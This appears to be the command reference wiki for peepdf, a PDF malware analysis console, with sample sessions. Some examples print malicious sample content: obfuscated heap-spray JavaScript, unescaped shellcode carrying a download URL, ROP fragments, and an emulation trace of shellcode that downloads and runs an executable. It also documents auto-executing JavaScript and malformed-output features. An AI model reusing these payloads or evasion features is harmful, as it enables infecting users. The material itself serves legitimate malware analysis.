You must be signed in to change notification settings - Fork 245
There are a lot of commands that can be used in the interactive console of peepdf and here there is an explanation of all of them: ### Showing information ### * [bytes](#bytes) * [changelog](#changelog) * [errors](#errors) * [hash](#hash) * [info](#info) * [metadata](#metadata) * [object](#object) * [offsets](#offsets) * [rawobject](#rawobject) * [rawstream](#rawstream) * [references](#references) * [save\_version](#save_version) * [stream](#stream) * [tree](#tree)
Usage: bytes offset num_bytes [file]
Show or store in the specified file "num_bytes" of the file beginning from "offset"
PPDF> bytes 0 100
1 0 obj
<</Type /Catalog
/Pages 2 0 R
2 0 obj
<</Type /Pages
/Kids [ 3 0 R ]
Usage: changelog [version]
Show the changelog of the document or version of the document
PPDF> changelog
Changes in version 1:
Producer: Acrobat Web Capture 8.0
Modification date: 2009-03-05T21:46:22+08:00
Added objects: [48]
Modified objects: [27, 29, 31]
Usage: create pdf simple|(open_action_js [js_file])
Create a new simple PDF file or one with Javascript code to be executed when opening the file. It's possible to specify
the file where the Javascript code is stored or do it manually.
PPDF> create pdf open_action_js
Please, specify the Javascript code you want to include in the file (if the code includes EOL characters use a
js_file instead):
app.alert("Hello World!!",3);
PDF structure created successfully!!
The Javascript code specified here will be executed when the document is opened.
Usage: create object_stream [version]
Create an object stream choosing the objects to be compressed.
PPDF> create object_stream
Warning: stream objects cannot be compressed. If the Catalog object is compressed could lead to corrupted
files for Adobe Reader!!
Which objects do you want to compress? (Valid respones: all | 1-5 | 1,2,5,7,8) all
*** Warning: Stream objects cannot be compressed!!
The object stream has been created successfully
Here it's important to highlight that despite the warnings the objects are compressed successfully, but the PDF
specification says that stream objects cannot be compressed.
Usage: decode variable var_name filter1 [filter2 ...]
Usage: decode file file_name filter1 [filter2 ...]
Usage: decode raw offset num_bytes filter1 [filter2 ...]
Decode the content of the specified variable, file or raw bytes using the following filters or algorithms:
base64,b64: Base64
asciihex,ahx: /ASCIIHexDecode
ascii85,a85: /ASCII85Decode
lzw: /LZWDecode
flatedecode,fl: /FlateDecode
runlength,rl: /RunLengthDecode
ccittfax,ccf: /CCITTFaxDecode
jbig2: /JBIG2Decode (Not implemented)
dct: /DCTDecode (Not implemented)
jpx: /JPXDecode (Not implemented)
PPDF> bytes 70 37
78 9c 4b 2c 28 d0 4b cc 49 2d 2a d1 50 f2 48 cd |x.K,(.K.I-*.P.H.|
c9 c9 57 08 cf 2f ca 49 51 54 54 d2 31 d6 b4 06 |..W../.IQTT.1...|
00 96 69 09 15 |..i..|
PPDF> decode raw 70 37 fl
app.alert("Hello World!!",3);
Usage: decrypt $password
Decrypts the file with the specified password
### embed ### ``` Usage: embed [-x] filename [file_type]
Embed the specified file in the actual PDF file. The default type is "application/pdf".
Options: -x: The file is executed when the actual PDF file is opened
<br />
### encode ###
Usage: encode variable var_name filter1 [filter2 ...] Usage: encode file file_name filter1 [filter2 ...] Usage: encode raw offset num_bytes filter1 [filter2 ...]
Encode the content of the specified variable, file or raw bytes using the following filters or algorithms: base64,b64: Base64 asciihex,ahx: /ASCIIHexDecode ascii85,a85: /ASCII85Decode (Not implemented) lzw: /LZWDecode flatedecode,fl: /FlateDecode runlength,rl: /RunLengthDecode (Not implemented) ccittfax,ccf: /CCITTFaxDecode (Not implemented) jbig2: /JBIG2Decode (Not implemented) dct: /DCTDecode (Not implemented) jpx: /JPXDecode (Not implemented)
PPDF> bytes 49 29
app.alert("Hello World!!",3);
PPDF> encode raw 49 29 fl
78 9c 4b 2c 28 d0 4b cc 49 2d 2a d1 50 f2 48 cd |x.K,(.K.I-*.P.H.| c9 c9 57 08 cf 2f ca 49 51 54 54 d2 31 d6 b4 06 |..W../.IQTT.1...| 00 96 69 09 15 |..i..|
<br />
### encode\_strings ###
Usage: encode_strings [id|trailer [version]]
Encode the strings and names included in the file, object or trailer
PPDF> rawobject 2
<< /Kids [ 3 0 R ] /Type /Pages /Count 1 >>
PPDF> encode_strings 2
Object encoded successfully
PPDF> rawobject 2
<< /#4b#69#64#73 [ 3 0 R ] /#54#79#70#65 /#50#61#67#65#73 /#43#6f#75#6e#74 1 >>
PPDF> rawobject 4
(This is a test string object!!)
PPDF> encode_strings 4
Object encoded successfully
PPDF> rawobject 4
<br />
### encrypt ###
Usage: encrypt [password]
Encrypt the file with the default or specified password
<br />
### errors ###
Usage: errors [object_id|xref|trailer [version]]
Shows the errors of the file or object (object_id, xref, trailer)
PPDF> errors
Bad object for /XObject key (1) No entries in xref section (1)
<br />
### exit ###
Usage: exit
Exits from the console
<br />
### filters ###
Usage: filters object_id [version] [filter1 [filter2 ...]]
Shows the filters found in the stream object or set the filters in the object (first filter is used first). The valid values for filters are the following: none: No filters asciihex,ahx: /ASCIIHexDecode ascii85,a85: /ASCII85Decode (Not implemented) lzw: /LZWDecode flatedecode,fl: /FlateDecode runlength,rl: /RunLengthDecode (Not implemented) ccittfax,ccf: /CCITTFaxDecode (Not implemented) jbig2: /JBIG2Decode (Not implemented) dct: /DCTDecode (Not implemented) jpx: /JPXDecode (Not implemented)
PPDF> rawobject 5
<< /Length 37 /Filter /FlateDecode >> stream x�K,(�K�I-*�P�H����/�IQTT�1ִ�i endstream
PPDF> filters 5
PPDF> filters 5 none
<< /Length 29 >> stream app.alert("Hello World!!",3); endstream
PPDF> rawobject 5
<< /Length 29 >> stream app.alert("Hello World!!",3); endstream
PPDF> filters 5
*** Warning: No filters found in the object!!
PPDF> filters 5 fl ahx
<< /Length 74 /Filter [ /ASCIIHexDecode /FlateDecode ] >> stream 789c4b2c28d04bcc492d2ad150f248cdc9c95708cf2fca49515454d231d6b4060096690915 endstream
<br />
### hash ###
Usage: hash object|rawobject|stream|rawstream object_id [version] Usage: hash raw offset size Usage: hash file fileName Usage: hash variable varName
Generates the hash (MD5/SHA1/SHA256) of the specified source: raw bytes of the file, objects and streams, and the content of files or variables
PPDF> hash rawstream 10
MD5: 9212aff46b662808a613f11b4d9d3673 SHA1: 1fbf5269f10a36f4863cfa4e14188537efd23ca1 SHA256: 7b2b2f2b33ec2531769bd457f20d13e177aee04ac59a06a02fad1a7abcfa4c14
PPDF> hash variable myVar
MD5: 852ce9336716bd31de5fca2587c2f156 SHA1: 7632ca7738817cf66d8f772430be8db7b00aac96 SHA256: b2a4305f1fa2d2d1a1bb363cbb1e6680161d78b89beb3aafe160ff1d694426b2
### help ###
Usage: help [command]
Show the available commands or the usage of the specified command
<br />
### info ###
Usage: info [object_id|xref|trailer [version]]
Shows information of the file or object (object_id, xref, trailer)
PPDF> info
File: js_stream.pdf MD5: 46f01049fb8f87c535cc96185fe9d702 Size: 458 bytes Version: 1.6 Binary: True Linearized: False Encrypted: False Updates: 0 Objects: 5 Streams: 1 Comments: 0 Errors: 0
Version 0: Catalog: 1 Info: No Objects (5): [1, 2, 3, 4, 5] Streams (1): [5] Encoded (1): [5] Suspicious elements: /OpenAction: [1] /JS: [4] /JavaScript: [4]
PPDF> info 1
Offset: 17 Size: 66 Object: dictionary Type: /Catalog References: ['2 0 R', '4 0 R']
PPDF> info trailer
Offset: 406 Size: 46 Stream: No Objects: 6 Root Object: 1 Info Object: No Encrypted: No
<br />
### js\_analyse ###
Usage: js_analyse variable var_name Usage: js_analyse file file_name Usage: js_analyse object object_id [version]
Analyses the Javascript code stored in the specified variable, file or object
This command perform some substitutions in the code in order to obtain the last stage of the Javascript code and search
for escaped bytes and shellcodes. It's not always possible to be successful with this analysis, so maybe a manual
approach with other commands will be necessary.
PPDF> js_analyse object 13
Javascript code:
var tX1PnUHy = new Array(); function lRUWC(E79yB, NPvAvQ){ while (E79yB.length * 2 < NPvAvQ){ E79yB += E79yB; } E79yB = E79yB.substring(0, NPvAvQ / 2); return E79yB; } function YVYohZTd(bBeUHg){ var NTLv7BP = 0x0c0c0c0c; rpifVgf = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" + "%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64"+ "%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787"+ "%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3"+ "%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" + "%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66"+ "%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef"+ "%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64"+ "%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf..."
Unescaped bytes: 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef |CCCC..[3.f....3.| 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef |C.........�.N...| ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef |.d..d..Bd..n....| ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa |.d...a........f.| eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9 |...w.e......f...| 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00 |.._.-.....f.....| 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a |!...;...f.......| 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66 |W.)...f...o.,..f| aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee |........f..d....| b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f |.d....d.........| 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf |.x...f..dl/.f..| 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07 |......d.....d...| 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb |.......(.....(..| 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7 |.......d.....d..| 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10 |............4...| 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef |....d.....d.....| ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7 |.......d.....d..| 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7 |.......d.....d..| 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e |................| 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64 |l....d5......d.d| 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9 |..d...d..d......| 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0 |d.....&..B.,....| 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11 |Q......!........| b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64 |....d.d...2.d..d| b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b |...2d.d...-....| 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f |..........http:/| 2f 62 69 6b 70 61 6b 6f 63 2e 63 6e 2f 6e 75 63 |/bikpakoc.cn/nuc| 2f 65 78 65 2e 70 68 70 |/exe.php|
URLs in shellcode: http://bikpakoc.cn/nuc/exe.php
<br />
### js\_beautify ###
Usage: js_beautify variable var_name Usage: js_beautify file file_name Usage: js_beautify object object_id [version]
Beautifies the Javascript code stored in the specified variable, file or object
PPDF> stream 15
function yyy(){while(1>2) ;}
function datagood(a,b) { if (a>b) {datagood(a,b)} if (b>a) {datagood(a,b)} return a; }
PPDF> js_beautify object 15
function yyy() { while (1 > 2); }
function datagood(a, b) { if (a > b) { datagood(a, b) } if (b > a) { datagood(a, b) } return a; }
<br />
### js\_code ###
Usage: js_code object_id [version]
Shows the Javascript code found in the object
If the Javascript code found in the object can be executed and generates another Javascript code stage all
the stages can be shown.
PPDF> js_code 13
There are more than one Javascript code, do you want to see all (1) or just the last one (2)? 1
================== Original Javascript code ================== function nofaq(lgc){var ppwsd="";for(rxr=0;rxr<lgc.length;rxr+=2){ ppwsd+=(String.fromCharCode(parseInt(lgc.substr(rxr,5),19))); } eval(ppwsd); } nofaq("0D0A6452...");
================== Next stage of Javascript code ==================
var tX1PnUHy = new Array(); function lRUWC(E79yB, NPvAvQ){ while (E79yB.length * 2 < NPvAvQ){ E79yB += E79yB; } E79yB = E79yB.substring(0, NPvAvQ / 2); return E79yB; } function YVYohZTd(bBeUHg){ var NTLv7BP = 0x0c0c0c0c; rpifVgf = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001..."); if (bBeUHg == 1){NTLv7BP = 0x30303030;}
var i388Ag8 = 0x400000;
var JKn0PaC = rpifVgf.length * 2;
var NPvAvQ = i388Ag8 - (JKn0PaC + 0x38);
var E79yB = unescape("%u9090%u9090");
E79yB = lRUWC(E79yB, NPvAvQ);
var fwdFfLgn = (NTLv7BP - 0x400000) / i388Ag8;
for (var HEUAQgED = 0; HEUAQgED < fwdFfLgn; HEUAQgED ++ ){
tX1PnUHy[HEUAQgED] = E79yB + rpifVgf;
<br />
### js\_eval ###
Usage: js_eval variable var_name Usage: js_eval file file_name Usage: js_eval object object_id [version]
Executes the Javascript code stored in the specified variable, file or object
PPDF> set jscode "var a = 8; a = a + 2; print('The content of the variable is '+a);" PPDF> js_eval variable jscode The variable may not contain Javascript code, do you want to continue? (y/n) y The content of the variable is 10
First, we put Javascript code in a variable. After that we can use the _js\_eval_ command to execute it. There is a warning
because the code is very short to be identified as Javascript code.
<br />
### js\_jjdecode ###
Usage: js_jjdecode variable $var_name Usage: js_jjdecode file $file_name Usage: js_jjdecode object $object_id [$version]
Decodes the Javascript code stored in the specified variable, file or object using the jjencode/decode algorithm by Yosuke Hasegawa (http://utf-8.jp/public/jjencode.html)
PPDF> show encoded_stream
PPDF> js_jjdecode variable encoded_stream
var shellcode = unescape("%u00E8..."); var executable = ""; var rop9 = ""; rop9 += unescape("%u313d%u4a82"); rop9 += unescape("%ua713%u4a82"); rop9 += unescape("%u1f90%u4a80"); [...]
<br />
### js\_join ###
Usage: js_join variable var_name Usage: js_join file file_name
Joins some strings separated by quotes and stored in the specified variable or file in a unique one
aux = "%u65"+"54"+"%u74"+"73"
js_join variable aux
<br />
### js\_unescape ###
Usage: js_unescape variable var_name Usage: js_unescape file file_name
Unescapes the escaped characters stored in the specified variable or file
aux = "%u6554%u7473"
js_unescape variable aux
54 65 73 74 |Test|
<br />
### js\_vars ###
Usage: js_vars [$var_name]
Shows the Javascript variables defined in the execution context or the content of the specified variable
PPDF> js_vars
['shellcode', 'executable', 'rop9', 'rop10', 'rop11', 'r11', 'obj_size', 'rop', 'ret_addr', 'rop_addr', 'r_addr', 'payload', 'vv', 'part1', 'part2', 'part2_len', 'arr', 'heapSpray', 'evalCode']
PPDF> js_vars obj_size
<br />
### log ###
Usage: log
Show the actual state of logging
Usage: log stop
Stop logging
Usage: log log_file
Starts logging in the specified file
<br />
### malformed\_output ###
Usage: malformed_output [option1 [option2 ...] [header_file]]
Enable malformed output when saving the file:
0: Removes all the malformed options.
1 [header_file]: Enable all the implemented tricks. Default option.
2 [header_file]: Puts the default or specified header before the PDF header.
3: Removes all the "endobj" tags.
4: Removes all the "endstream" tags.
5: Removes the "xref" section.
6: Bad header: %PDF-1
<br />
### metadata ###
Usage: metadata [version]
Show the metadata of the document or version of the document
PPDF> metadata
Info Object in version 0:
<< /Title /ModDate 2008312053854 /CreationDate 2008312053854 /Producer Scribus PDF Library /Trapped /False /Creator Scribus /Keywords /Author >>
<br />
### modify ###
Usage: modify object|stream id [version] [file]
Modify the object or stream specified. It's possible to use a file to retrieve the stream content (ONLY for stream content).
PPDF> object 4
<< /Kids [ 9 0 R ] /Count 1 /Resources 8 0 R /Type /Pages >>
PPDF> modify object 4
Key: /Kids Raw value: [ 9 0 R ]
Do you want to modify, delete or make no action? (m/d/n) n
Key: /Count Raw value: 1 Value: 1
Do you want to modify, delete or make no action? (m/d/n) m
Raw value: 1
Do you want to modify, delete or make no action? (m/d/n) m
Please, specify the number object content:
Key: /Resources Raw value: 8 0 R
Do you want to modify, delete or make no action? (m/d/n) m
Raw value: 8 0 R
Do you want to modify, delete or make no action? (m/d/n) m
Please, specify the reference object content:
1 0 R
Key: /Type Raw value: /Pages
Do you want to modify, delete or make no action? (m/d/n) n
Do you want to add more entries? (y/n) n
Object modified successfully!!
PPDF> object 4
<< /Kids [ 9 0 R ] /Count 18 /Resources 1 0 R /Type /Pages >>
<br />
### object ###
Usage: object object_id [version]
Shows the content of the object after being decoded and decrypted.
PPDF> object 1 0
<< /AcroForm 5 0 R /Threads 2 0 R /Names 7 0 R /OpenAction << /S /JavaScript /JS this.uSQXcfcd2() >> /Pages 4 0 R /Outlines 3 0 R /Type /Catalog /PageLayout /SinglePage /Dests 6 0 R /ViewerPreferences << /PageDirection /L2R >> >>
<br />
### offsets ###
Usage: offsets [num_version]
Shows the physical map of the file or the specified version of the document
The output of this command shows in a visual way the physical structure of the document. We can see
the starting and ending offsets and the size of the elements (in brackets).
PPDF> offsets
0 Header
Object 1 (260)
Object 2 (19)
Object 3 (48)
Object 4 (77)
Object 5 (33)
Object 6 (21)
Object 7 (41)
Object 8 (68)
Object 9 (187)
Object 10 (52)
Object 11 (85)
Object 12 (50)
Object 13 (5903)
Object 14 (204)
Xref Section (325)
Trailer (69)
7489 EOF
<br />
### open ###
Usage: open [-fl] filename
Open and parse the specified file
Options: -f: Sets force parsing mode to ignore errors -l: Sets loose parsing mode for problematic files
<br />
### quit ###
Usage: quit
Exits from the console
<br />
### rawobject ###
Usage: rawobject [object_id|xref|trailer [version]]
Show the content of the object without being decoded or decrypted (object_id, xref, trailer)
PPDF> rawobject xref
xref 0 15 0000000000 65535 f 0000000015 00000 n 0000000261 00000 n 0000000279 00000 n 0000000324 00000 n 0000000397 00000 n 0000000428 00000 n 0000000448 00000 n 0000000487 00000 n 0000000553 00000 n 0000000731 00000 n 0000000781 00000 n 0000000862 00000 n 0000000909 00000 n 0000004186 00000 n
PPDF> rawobject trailer
trailer << /Size 15 /Info 14 0 R /Root 1 0 R >> startxref 4374 %%EOF
PPDF> rawobject 4
<< /Kids [ 9 0 R ] /Count 18 /Resources 1 0 R /Type /Pages >>
<br />
### rawstream ###
Usage: rawstream object_id [version]
Shows the stream content of the specified document version before being decoded and decrypted
PPDF> rawstream 1
78 9c 45 8e c1 0a 83 30 10 44 ef f9 8a f9 83 4d |x.E....0.D.....M| 5a 15 0b 22 b4 de 2c a5 a2 bd 15 0f c1 06 09 14 |Z.."..,.........| 23 1a 4b fb f7 5d 6b a0 2c 7b d8 61 e6 ed 28 48 |#.K..]k.,{.a..(H| ec 10 2b ec 71 88 10 41 25 29 b2 0c 74 fb 8c 06 |..+.q..A%)..t...| 54 68 af 9f ae 17 54 e9 de cc 6c 94 a8 05 5d 47 |Th....T...l...]G| 33 1c 3b 6f dd c0 01 56 90 e7 6b e4 6c 1f 33 ee |3.;o...V..k.l.3.| 0c 5a a5 56 04 c4 2f 29 a8 70 cb e0 a1 82 b5 d2 |.Z.V../).p......| 93 e1 33 f0 fe 46 41 b5 99 dd 32 75 fc 8c 7d 79 |..3..FA...2u..}y| 2e e8 62 1e 56 9f dc 9b c9 92 27 91 12 29 6f 1b |..b.V.....'..)o.| 48 5b 76 6b 23 a8 01 95 fa a5 9b 6e b2 a3 17 54 |H[vk#......n...T| 36 88 43 c1 2f a0 0d 3e 09 0a |6.C./..>..|
PPDF> stream 1
1 0 2 51 3 94 4 168 << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >><< /Kids [ 3 0 R ] /Type /Pages /Count 1 >><< /Parent 2 0 R /Type /Page /Resources << >> /MediaBox [ 0 0 600 800 ] >><< /Type /Action /S /JavaScript /JS 5 0 R >>
<br />
### references ###
Usage: references to|in object_id [version]
Shows the references in the object or to the object in the specified version of the document
PPDF> references in 2
['3 0 R']
PPDF> object 2
<< /Kids [ 3 0 R ] /Type /Pages /Count 1 >>
PPDF> references to 2
[1, 3]
PPDF> object 3
<< /Parent 2 0 R /Type /Page /Resources << >> /MediaBox [ 0 0 600 800 ] >>
<br />
### replace ###
Usage: replace all string1 string2
Replace 'string1' with 'string2' in the whole PDF file
Usage: replace variable var_name string1 string2 Usage: replace file file_name string1 string2
Replace 'string1' with 'string2' in the content of the specified variable or file
PPDF> object 2
<< /Kids [ 3 0 R ] /Type /Pages /Count 1 >>
PPDF> object 3
<< /Parent 2 0 R /Type /Page /Resources << >> /MediaBox [ 0 0 600 800 ] >>
PPDF> replace all Page OtherWord
The string has been replaced correctly
PPDF> object 2
<< /Kids [ 3 0 R ] /Type /OtherWords /Count 1 >>
PPDF> object 3
<< /Parent 2 0 R /Type /OtherWord /Resources << >> /MediaBox [ 0 0 600 800 ] >>
PPDF> set myvar "Hello World" PPDF> replace variable myvar Hello Bye
The string has been replaced correctly
PPDF> show myvar
Bye World
<br />
### reset ###
Usage: reset
Cleans the console
Usage: reset var_name
Resets the variable value to the default value if applicable
It's specially useful when we change the standard ouput of the console to a file or variable to
restore it to the normal output. See [set](#set) command.
PPDF> reset output
output = "stdout"
<br />
### save ###
Usage: save [filename]
Saves the file to disk
It's recommended to use this command when we make modifications in the document to keep it free of
conflicts. For example, if we don't save the changes we can have inconsistent results when we use
"object" and "rawobject" commands, because one of them is related to the file before the modifications
and the other one after them.
<br />
### save\_version ###
Usage: save_version num_version filename
Saves the selected file version to disk
<br />
### sctest ###
Usage: sctest variable var_name Usage: sctest file file_name Usage: sctest raw offset num_bytes
Wrapper of the sctest tool (libemu) to emulate shellcodes
PPDF> sctest file /tmp/shellcode
verbose = 0 Hook me Captain Cook! userhooks.c:127 user_hook_ExitThread ExitThread(32) stepcount 9172 FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x0041767d => = "GetSystemDirectoryA"; ) = 0x7c814eea; FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x00417691 => = "WinExec"; ) = 0x7c86136d; FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x00417699 => = "ExitThread"; ) = 0x7c80c058; FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x004176a4 => = "LoadLibraryA"; ) = 0x7c801d77; HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x004176b1 => = "urlmon"; ) = 0x7df20000; FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7df20000 => none; LPCSTR lpProcName = 0x004176b8 => = "URLDownloadToFileA"; ) = 0x7df7b0bb; UINT GetSystemDirectory ( LPTSTR lpBuffer = 0x0012fe7c => none; UINT uSize = 32; ) = 19; HRESULT URLDownloadToFile ( LPUNKNOWN pCaller = 0x00000000 => none; LPCTSTR szURL = 0x004176cb => = "http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe"; LPCTSTR szFileName = 0x0012fe7c => = "c:\WINDOWS\system32\a.exe"; DWORD dwReserved = 0; LPBINDSTATUSCALLBACK lpfnCB = 0; ) = 0; UINT WINAPI WinExec ( LPCSTR lpCmdLine = 0x0012fe7c => = "c:\WINDOWS\system32\a.exe"; UINT uCmdShow = 0; ) = 32; void ExitThread ( DWORD dwExitCode = 32; ) = 0;
<br />
### search ###
Usage: search [hex] string
Search the specified string or hexadecimal string in the objects (decoded and encrypted streams included)
Example: search hex \x34\x35
PPDF> search javascript
PPDF> search hex \x4a\x61\x76\x61
<br />
### set ###
Usage: set [var_name var_value]
Sets the specified variable value or creates one with this value. Without parameters all the variables are shown.
Special variables:
header_file: READ ONLY. Specifies the file header to be used when 'malformed_options' are active.
malformed_options: READ ONLY. Variable to store the malformed options used to save the file.
output_limit: variable to specify the maximum number of lines to be shown at once when the output is long.
By default there is no limit.
~~Thanks to this command it's possible to store the result of the rest of commands or anything we want in a
variable or in a file.~~ The "set output" way to store the commands output has been deprecated, use instead ">" and ">>" for files, and "$>" and "$>>" for variables:
PPDF> rawstream 5
78 da 05 c1 7b 7f 6a 60 00 00 e0 cf 72 dc 5e 8b |x...{�j....r.^.| 5a 26 22 8a 37 62 ea 87 cd ad 8b cb ab 25 e4 54 |Z&".7b.......%.T| a7 da fa 77 9f fd 3c cf 92 bd 3f 18 bd 89 47 50 |...w..<...?...GP| 69 69 d2 81 34 6b 3b f5 c2 17 cc d3 6b bb 90 f8 |ii..4k;.....k...| b7 b0 f5 5e 58 48 7c 7f 84 1a 1c b8 ed f9 4e 23 |...^XH|�......N#| 40 2a 68 5e 43 af eb 7b 8e f2 35 cb f0 2a 2b 3f |@*h^C..{..5..*+?| 41 95 64 b0 a9 af d8 a1 f0 af 51 eb 39 e3 b7 34 |A.d.......Q.9..4| 2a 84 9d 41 1c 5f ad 59 82 3b fd e9 4a 35 39 9b |*..A._.Y.;..J59.| db 30 64 3e 92 d4 6c 21 98 e4 0b 2b 31 e7 e8 6e |.0d>..l!...+1..n| 21 89 2e f6 d4 96 57 b4 54 1e 26 61 b7 b6 16 93 |!.....W.T.&a....| 67 68 b8 be 8b 79 f1 fe 82 ee eb e2 99 92 f7 68 |gh...y.........h| b0 b4 5c 14 10 dc 38 3f dc f8 d0 ac 60 ff 36 a5 |..\...8?....
d6 d8 e3 b2 61 75 0c 2b 1f a6 b6 17 5a cd ea 3a |....au.+....Z..:|
7f ff a3 11 b6 38 e0 29 5c e0 6e 72 a9 73 1b 6d |�....8.).nr.s.m|
2e c7 9c 92 83 a3 48 96 bb 3f cc 64 85 af a8 44 |......H..?.d...D|
92 ed a6 50 e9 56 fa 4b f5 6f e2 67 e0 43 e6 56 |...P.V.K.o.g.C.V|
7d d8 58 10 a9 70 a8 e0 3b 25 d1 29 e3 ab 2a 7b |}.X..p..;%.)..{|
f2 2a bd c8 9d c1 51 64 80 d5 8c e0 70 f6 74 0b |.....Qd....p.t.|
bc 73 47 52 c8 e3 3a 2c 66 2f c1 bf 1f 10 27 ea |.sGR..:,f/....'.|
ee 31 b2 4c 15 80 51 c5 1e 76 bc 7b 9a 65 c4 7b |.1.L..Q..v.{.e.{|
ef a4 20 66 b9 42 43 8e 96 3b 28 9e 45 4b a2 c4 |.. f.BC..;(.EK..|
a9 21 74 6c 93 15 44 b9 05 5a 63 e7 66 d4 a8 48 |.!tl..D..Zc.f..H|
2e e7 39 18 c7 c6 58 19 82 0d 16 7c 5f 7b c7 8b |..9...X....|_{..|
8a ab 6b 2f e5 eb 24 3c 6c f5 8a d8 ca 68 51 3c |..k/..$<l....hQ<|
9e cb 89 f3 3b fb 0f 6c d4 7d d7 0d 0a |....;..l.}...|
PPDF> rawstream 5 $> stream5
78 da 05 c1 7b 7f 6a 60 00 00 e0 cf 72 dc 5e 8b |x...{�j....r.^.| 5a 26 22 8a 37 62 ea 87 cd ad 8b cb ab 25 e4 54 |Z&".7b.......%.T| a7 da fa 77 9f fd 3c cf 92 bd 3f 18 bd 89 47 50 |...w..<...?...GP| 69 69 d2 81 34 6b 3b f5 c2 17 cc d3 6b bb 90 f8 |ii..4k;.....k...| b7 b0 f5 5e 58 48 7c 7f 84 1a 1c b8 ed f9 4e 23 |...^XH|�......N#| 40 2a 68 5e 43 af eb 7b 8e f2 35 cb f0 2a 2b 3f |@*h^C..{..5..*+?| 41 95 64 b0 a9 af d8 a1 f0 af 51 eb 39 e3 b7 34 |A.d.......Q.9..4| 2a 84 9d 41 1c 5f ad 59 82 3b fd e9 4a 35 39 9b |*..A._.Y.;..J59.| db 30 64 3e 92 d4 6c 21 98 e4 0b 2b 31 e7 e8 6e |.0d>..l!...+1..n| 21 89 2e f6 d4 96 57 b4 54 1e 26 61 b7 b6 16 93 |!.....W.T.&a....| 67 68 b8 be 8b 79 f1 fe 82 ee eb e2 99 92 f7 68 |gh...y.........h| b0 b4 5c 14 10 dc 38 3f dc f8 d0 ac 60 ff 36 a5 |..\...8?....
d6 d8 e3 b2 61 75 0c 2b 1f a6 b6 17 5a cd ea 3a |....au.+....Z..:|
7f ff a3 11 b6 38 e0 29 5c e0 6e 72 a9 73 1b 6d |�....8.).nr.s.m|
2e c7 9c 92 83 a3 48 96 bb 3f cc 64 85 af a8 44 |......H..?.d...D|
92 ed a6 50 e9 56 fa 4b f5 6f e2 67 e0 43 e6 56 |...P.V.K.o.g.C.V|
7d d8 58 10 a9 70 a8 e0 3b 25 d1 29 e3 ab 2a 7b |}.X..p..;%.)..{|
f2 2a bd c8 9d c1 51 64 80 d5 8c e0 70 f6 74 0b |.....Qd....p.t.|
bc 73 47 52 c8 e3 3a 2c 66 2f c1 bf 1f 10 27 ea |.sGR..:,f/....'.|
ee 31 b2 4c 15 80 51 c5 1e 76 bc 7b 9a 65 c4 7b |.1.L..Q..v.{.e.{|
ef a4 20 66 b9 42 43 8e 96 3b 28 9e 45 4b a2 c4 |.. f.BC..;(.EK..|
a9 21 74 6c 93 15 44 b9 05 5a 63 e7 66 d4 a8 48 |.!tl..D..Zc.f..H|
2e e7 39 18 c7 c6 58 19 82 0d 16 7c 5f 7b c7 8b |..9...X....|_{..|
8a ab 6b 2f e5 eb 24 3c 6c f5 8a d8 ca 68 51 3c |..k/..$<l....hQ<|
9e cb 89 f3 3b fb 0f 6c d4 7d d7 0d 0a |....;..l.}...|
PPDF> show stream5
